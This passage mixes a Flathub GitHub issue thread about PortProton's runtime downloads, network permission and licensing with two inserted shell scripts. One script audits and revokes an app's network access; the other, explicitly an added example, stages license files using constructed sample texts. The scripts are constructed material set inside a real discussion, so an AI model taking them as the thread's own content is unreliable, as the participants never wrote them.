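# has_network_share <permissions-text>
# Returns 0 when the shared= key of the [Context] section lists "network".
# A "!network" entry (the form an override writes) is a removal, not a grant,
# so it is deliberately not matched.
has_network_share() {
    printf '%s\n' "$1" | awk -F= '
        /^\[/ { section = $0; next }
        section == "[Context]" && $1 == "shared" {
            n = split($2, items, ";")
            for (i = 1; i <= n; i++) if (items[i] == "network") found = 1
        }
        END { exit found ? 0 : 1 }'
}

# revoke_network_cmd <app-id>
# Prints the command that removes network access for the current user only;
# the app's own metadata is left untouched.
revoke_network_cmd() {
    printf 'flatpak override --user --unshare=network %s\n' "$1"
}

# write_network_override <app-id> [overrides-dir]
# Writes the equivalent override as a plain-text file so it can be reviewed
# or distributed by configuration management. The default directory is the
# per-user overrides location. Prints the path written.
write_network_override() {
    app="$1"
    dir="${2:-$HOME/.local/share/flatpak/overrides}"
    mkdir -p "$dir"
    printf '[Context]\nshared=!network;\n' > "$dir/$app"
    printf '%s\n' "$dir/$app"
}

# main [app-id]: audit the installed app when flatpak is available, otherwise
# fall back to the constructed sample so the script still demonstrates the check.
main() {
    app="${1:-ru.linux_gaming.PortProton}"
    if command -v flatpak >/dev/null 2>&1; then
        perms=$(flatpak info --show-permissions "$app" 2>/dev/null) || perms="$SAMPLE_PERMISSIONS"
    else
        perms="$SAMPLE_PERMISSIONS"
    fi
    if has_network_share "$perms"; then
        echo "$app declares network access; to revoke it for this user run:"
        revoke_network_cmd "$app"
    else
        echo "$app does not declare network access"
    fi
}

main "$@"
```

After applying the override, `flatpak override --user --show <app-id>` prints the effective per-user changes; the app keeps every other permission it declared, so the check above is narrowly about the one capability that enables downloading code at runtime.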
@bbhtt
Contributor

bbhtt commented May 28, 2024

If there are any specific examples of PortProton shipping malicious libraries or binaries or just being malicious in general, rather than what can be malicious, please report them to [email protected] or open separate issues with specific examples.

I'm closing the issue, since it veered off course too much with a heated debate and there is nothing I see needing action from us, right now.

@Boria138

Any app with network access (--share=network) can and may, at runtime, download random files over the internet like it or not without any implications. The comparison with distro packages does not work because at least with flatpak you can revoke network access which is not possible on fully unsandboxed apps. If you feel unsafe about an app connecting to network, you can revoke that permission by flatpak override or Flatseal.

I agree that the custom wine and proton builds are better placed in the manifest instead of scripts in repo, but it's not possible to enforce that because wine and proton are too unstable and each app/game requires its own patches/version. There are also other applications like Steam and Bottles etc. doing similar things like downloading custom proton builds at runtime on user interaction. So we would need to block them too and review every single code change/update of all apps to ensure they don't do something similar. This is not possible.

Now about the licensing situation @Boria138:

  1. Please try to include any original copyright or license notices in /app/share/licenses/<component_name>.
  2. If a license prohibits redistribution of that component, you can use it as an extra-data source https://docs.flatpak.org/en/latest/module-sources.html#extra-data
  3. You can use conditionals like License A AND License B in the license tag of appstream if that is required https://docs.flathub.org/docs/for-app-authors/metainfo-guidelines/#license

We don't have the manpower or the legal expertise to determine what the final license should be when so many custom licenses are involved. But it is best to include the original license and to not modify the libraries in such cases.

https://github.com/Castro-Fidel/PortWINE/releases
https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton; everything the same is on cdn.linux-gaming.ru.

@Boria138 Please document these in the readme here https://github.com/flathub/ru.linux_gaming.PortProton and how the tarball you are shipping is created.

So I need to attach BSD 3 license (Proton), LGPL 2.1 (Wine) and MIT (PortProton) in /app/share/licence? How do I do this correctly? PortProton license is upstream, but where do I get the proton and wine license?

@bbhtt
Contributor

bbhtt commented May 28, 2024

Those licenses should be in the tarball source or whatever you are using. For example any debs always include them.

You can just move them to /app/share/licenses.

And also please document the process to create the tarball in readme, can be a link.

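The layout bbhtt asks for in the three licensing steps above (one directory per component under /app/share/licenses, the license files taken from the upstream tarballs) can be produced by a few build commands. The following is an added example, not code from the issue or from the PortProton manifest. In a flatpak manifest the `install_license` calls would be the `build-commands:` of a `buildsystem: simple` module whose sources are the upstream tarballs; a tarball that may not be redistributed would instead be a separate extra-data source and contributes no files at build time, so its license text has to come from a source that can be included. The component names, the `LICENSE.*` file names and the `LICENSE_PREFIX` variable are assumptions; the license contents in the demo are constructed stand-ins.

```shell
#!/usr/bin/env bash
# Added example: stage upstream license texts into
# $LICENSE_PREFIX/share/licenses/<component>/ and verify nothing was dropped.
# Not from the issue or the PortProton manifest. LICENSE_PREFIX defaults to
# /app (the flatpak build prefix) and can point at a scratch dir for testing.

LICENSE_PREFIX="${LICENSE_PREFIX:-/app}"

# install_license <component> <license-file>...
# Copies each file to $LICENSE_PREFIX/share/licenses/<component>/ and fails
# the build if a file is missing or empty, so a license can't be silently lost
# when an upstream tarball changes layout.
install_license() {
    component="$1"; shift
    dest="$LICENSE_PREFIX/share/licenses/$component"
    mkdir -p "$dest"
    for f in "$@"; do
        if [ ! -s "$f" ]; then
            echo "license file missing or empty: $f" >&2
            return 1
        fi
        install -m 644 "$f" "$dest/$(basename "$f")"
    done
}

# verify_licenses <component>...
# Post-install check: every named component must have at least one file.
verify_licenses() {
    status=0
    for c in "$@"; do
        if [ -z "$(ls -A "$LICENSE_PREFIX/share/licenses/$c" 2>/dev/null)" ]; then
            echo "no license installed for $c" >&2
            status=1
        fi
    done
    return $status
}

# list_licenses: print component/file pairs, one per line, sorted.
list_licenses() {
    ( cd "$LICENSE_PREFIX/share/licenses" 2>/dev/null && find . -type f | sed 's|^\./||' | sort )
}

# demo: constructed stand-ins for the three license texts named in the thread
# (MIT for PortProton, LGPL 2.1 for Wine, BSD 3-Clause for Proton). A real
# build would pass the LICENSE files shipped inside the upstream tarballs.
demo() {
    src=$(mktemp -d)
    printf 'MIT License (constructed sample)\n' > "$src/LICENSE.portproton"
    printf 'GNU LGPL 2.1 (constructed sample)\n' > "$src/LICENSE.wine"
    printf 'BSD 3-Clause (constructed sample)\n' > "$src/LICENSE.proton"
    install_license portproton "$src/LICENSE.portproton" &&
    install_license wine "$src/LICENSE.wine" &&
    install_license proton "$src/LICENSE.proton" &&
    verify_licenses portproton wine proton &&
    list_licenses
}

# Run the demo only when not building into the real /app prefix:
#   LICENSE_PREFIX=$(mktemp -d) sh stage-licenses.sh
case "$LICENSE_PREFIX" in
    /app) ;;
    *) demo ;;
esac
```

The appstream side of step 3 is then a single SPDX expression in the metainfo license tag that combines the three licenses named above, which the Flathub guidelines linked in the thread describe.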
@Boria138

And also please document the process to create the tarball in readme, can be a link.

I added a Readme where I described where the archive came from, but I also made a PR in upstream where I added the ability to unpack the archive if it is in the path

.var/app/en.linux_gaming.PortProton/data/tmp/

So, at the next update even those who are afraid that something happens to the tarball during the download can just download the master themselves and put it where they need it, I guess that takes care of the problem.
